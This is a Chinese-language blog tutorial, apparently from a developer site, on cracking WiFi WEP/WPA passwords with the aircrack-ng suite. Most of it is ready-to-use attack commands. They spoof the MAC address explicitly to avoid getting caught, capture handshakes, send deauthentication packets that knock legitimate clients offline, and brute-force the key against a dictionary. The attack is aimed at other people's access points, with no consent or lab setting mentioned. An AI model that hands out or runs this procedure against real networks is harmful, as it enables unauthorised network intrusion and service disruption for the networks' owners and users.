aircrack-ng 套件破解wifi(WPA)

  1. Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
    airmon-ng 处理网卡工作模式
    airodump-ng 抓包
    aircrack-ng 破解
    aireplay-ng 发包,干扰
    另外还要用到以下 linux 命令:
    ifconfig 查看修改网卡状态和参数
    macchanger 伪造 MAC
    iwconfig 主要针对无线网卡的工具 (同 ifconfig)
    iwlist 获取无线网络的更详细信息

  2. 具体破解步骤:
    1. 修改无线网卡状态:先 down 掉
    2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
    3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
    4. 修改无线网卡状态: up
    5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
    6. 监听抓包:生成 .cap 或 .ivs
    7.
     干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
    8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解

  3. 下面详细介绍一下各个命令的基本用法(参照命令的英文说明)

  4. 1. ifconfig
    用来配置网卡,我们这里主要用来 禁用和启用 网卡:
    ifconfig ath0 down 
    ifconfig ath0 up 
    禁用一下网卡的目的是为了下一步修改 MAC 。

  5. 2.macchanger
    用来改变网卡的 MAC 地址,具体用法如下:
    usage: macchanger [options] device
    -h 显示帮助
    -V 显示版本
    -s 显示当前MAC
    -e 不改变mac,使用硬件厂商写入的MAC
    -a 自动生成一个同类型的MAC,同厂商的
    -A 自动生成一个不同类型的MAC,不同厂商的
    -r 生成任意MAC
    -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
    -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。

  6. 3.airmon-ng
    启动无线网卡进入 Monitor 模式,
    useage: airmon-ng <start|stop|check> <interface> [channel]
    <start|stop|check> 启动,停止,检测
    <interface> 指定无线网卡
    [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了

  7. 下面以我的硬件实例来操作一下:
    我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:

  8. ifconfig ath0 down
    macchanger -r ath0
    macchanger -r wifi0
    ifconfig ath1 up
    airmon-ng start ath1 6
    iwconfig ath1
    iwlist ath1 scanning
    airodump-ng -w *.cap -c 6 ath1

  9. aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
    aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
    aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
    aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
    aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1

  10. aircrack-ng -x -f 2 *.cap
    aircrack-ng -w passdict.txt *.cap
    aircrack-ng -n 64 -b apmac *.ivs
    aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap

  11.     案例讲解:

  12. 使用命令airmon-ng start (外接网卡)将无线网卡切换到监听模式。

    aircrack-ng 套件破解wifi(wpa)

    aircrack-ng 套件破解wifi(wpa)

  13. 使用命令airodump-ng mon0(视情况而定)监听周围的所有ap信号。

    aircrack-ng 套件破解wifi(wpa)

  14. 选择要监听破解的wifi名称,记下bssid ,抓取wifi握手包。

    命令为: airodump-ng --ivs -w 包名 --bssid 目标MAC -c 信道 mon0(接口名称)

    aircrack-ng 套件破解wifi(wpa)

  15. 开始监听目标ap的流量开始抓包,如果终端左上角出现WPA handshake 说明抓到了握手包,可以进行暴力破解了。

    aircrack-ng 套件破解wifi(wpa)

  16. 使用命令 aircrack-ng  -w worldlist  握手包名。

    aircrack-ng 套件破解wifi(wpa)

    aircrack-ng 套件破解wifi(wpa)

  17. 等待一段时间,如果目标密码在字典中的话就可以找到。

    aircrack-ng 套件破解wifi(wpa)










进行Deauth攻击加速破解过程。

和破解WEP时不同,这里为了获得破解所需的WPA-PSK握手验证的整个完整数据包,无线黑客们将会发送一种称之为“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,黑客们也就有机会捕获到包含WPA-PSK握手验证的完整数据包了。此处具体输入命令如下:

aireplay-ng -0 1 –a AP的mac -c 客户端的mac wlan0 

参数解释:

-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为1,大家可以根据实际情况设置为10不等;

-a 后跟AP的MAC地址;

-c 后跟客户端的MAC地址;

回车后将会看到如下图26所示的deauth报文发送的显示。


  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值